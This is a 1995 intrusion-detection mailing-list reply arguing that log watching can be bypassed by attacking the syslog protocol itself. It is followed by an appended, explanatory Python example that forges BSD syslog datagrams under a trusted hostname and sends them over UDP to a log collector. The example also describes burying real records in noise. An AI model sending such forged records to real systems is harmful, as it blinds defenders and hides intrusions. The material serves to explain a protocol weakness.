[432] in Intrusion Detection Systems
Re: Good logging and real-t
daemon@ATHENA.MIT.EDU (Alexander O. Yuriev)
Fri Nov 24 11:53:42 1995
Date: Thu, 23 Nov 1995 19:17:42 -0500 (EST)
From: "Alexander O. Yuriev" <alex@bach.cis.temple.edu>
To: ids@uow.edu.au
In-Reply-To: <doug-9510211851.AA020510760@netman.eng.auburn.edu>
Reply-To: ids@uow.edu.au
On Tue, 21 Nov 1995, Doug Hughes wrote:
> Bypasses are certainly possible. However, the intruder would have to gain
> access, become root, somehow login to the remote restricted access machine
> (which by the way has rlogin, telnet, rexec, and shell stuff turned off)
> kill the program watching the logs (which would certainly make it disappear
> off the screen) and then restart it, all without the user noticing, and within
> 5 seconds..
You have just assumed something that you should not assume, i.e. that in
order to bypass your system the intruder needs to penetrate the trusted host. If I
am an intruder, I can quite successfully attempt an attack against the
syslog protocol instead of attempting to take over the trusted system.
Best wishes,
Alex
============================================================================
Alexander O. Yuriev Email: alex@bach.cis.temple.edu
CIS Labs, TEMPLE UNIVERSITY WWW: http://bach.cis.temple.edu/personal/alex
Philadelphia, PA, USA
KeyID: 1024/D62D4489 Key Fingerprint: AE84534377CCC4E2 37B13C4D8CD3D501
Unless otherwise stated, everything above is my personal opinion and not an
opinion of any organisation affiliated with me.
=============================================================================
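The protocol-level attack Alex points at, as an added example that is not part of the original thread: classic BSD syslog travels as a bare UDP datagram (port 514) of the form `<PRI>TIMESTAMP HOSTNAME MSG`, and nothing in that datagram binds it to the machine named in the HOSTNAME field. The parser, the forging helper and the sample log line below are constructed for this illustration (hypothetical names, not code from the list or from any syslogd); the point they make is that a record forged on an untrusted host parses identically to the record the trusted host would have emitted itself.

```python
import re
import socket

# Constructed sample: the record a trusted host's own syslogd would send to the
# central log collector (facility 4 = auth, severity 2 = crit, so PRI = 4*8+2 = 34).
GENUINE = b"<34>Nov 23 19:17:42 trusted su: 'su root' failed for alex on /dev/ttyp0"

# BSD syslog line: <PRI>Mmm dd hh:mm:ss HOSTNAME TAG: MSG
SYSLOG_RE = re.compile(
    r"^<(\d{1,3})>([A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (\S+) (.*)$"
)


def parse_bsd_syslog(datagram: bytes) -> dict:
    """Parse one BSD syslog datagram into its fields.

    Note what is NOT here: no signature, no nonce, no key. Every field,
    including the hostname, is simply whatever the sender chose to write.
    """
    m = SYSLOG_RE.match(datagram.decode("ascii", "replace"))
    if not m:
        raise ValueError("not a BSD syslog line")
    pri = int(m.group(1))
    return {
        "facility": pri // 8,
        "severity": pri % 8,
        "timestamp": m.group(2),
        "hostname": m.group(3),
        "msg": m.group(4),
    }


def forge_syslog(hostname: str, tag: str, message: str,
                 facility: int = 4, severity: int = 2,
                 timestamp: str = "Nov 23 19:17:42") -> bytes:
    """Build a syslog datagram claiming to come from `hostname`.

    Any host on the network can build this; the collector has no way to
    tell it from a record the named host generated itself.
    """
    pri = facility * 8 + severity
    return f"<{pri}>{timestamp} {hostname} {tag}: {message}".encode("ascii")


def indistinguishable(a: bytes, b: bytes) -> bool:
    """True when the collector would parse both datagrams to the same record."""
    return parse_bsd_syslog(a) == parse_bsd_syslog(b)


def send_spoofed(datagram: bytes, collector: str, port: int = 514) -> None:
    """Deliver a forged record to a collector over plain UDP (not run by the test).

    The UDP source address is equally unauthenticated, so filtering on it at
    the collector only raises the bar to a raw-socket sender, it does not
    close the hole.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(datagram, (collector, port))


if __name__ == "__main__":
    forged = forge_syslog("trusted", "su", "'su root' failed for alex on /dev/ttyp0")
    print("genuine:", parse_bsd_syslog(GENUINE))
    print("forged: ", parse_bsd_syslog(forged))
    print("collector can tell them apart:", not indistinguishable(GENUINE, forged))
```

The same forging routine serves the other direction of the attack the thread worries about: rather than a fake failure, an intruder can inject benign-looking records, or enough noise to bury the real ones, and the watcher on the restricted machine displays them all with the trusted hostname attached, without the intruder ever having touched that machine.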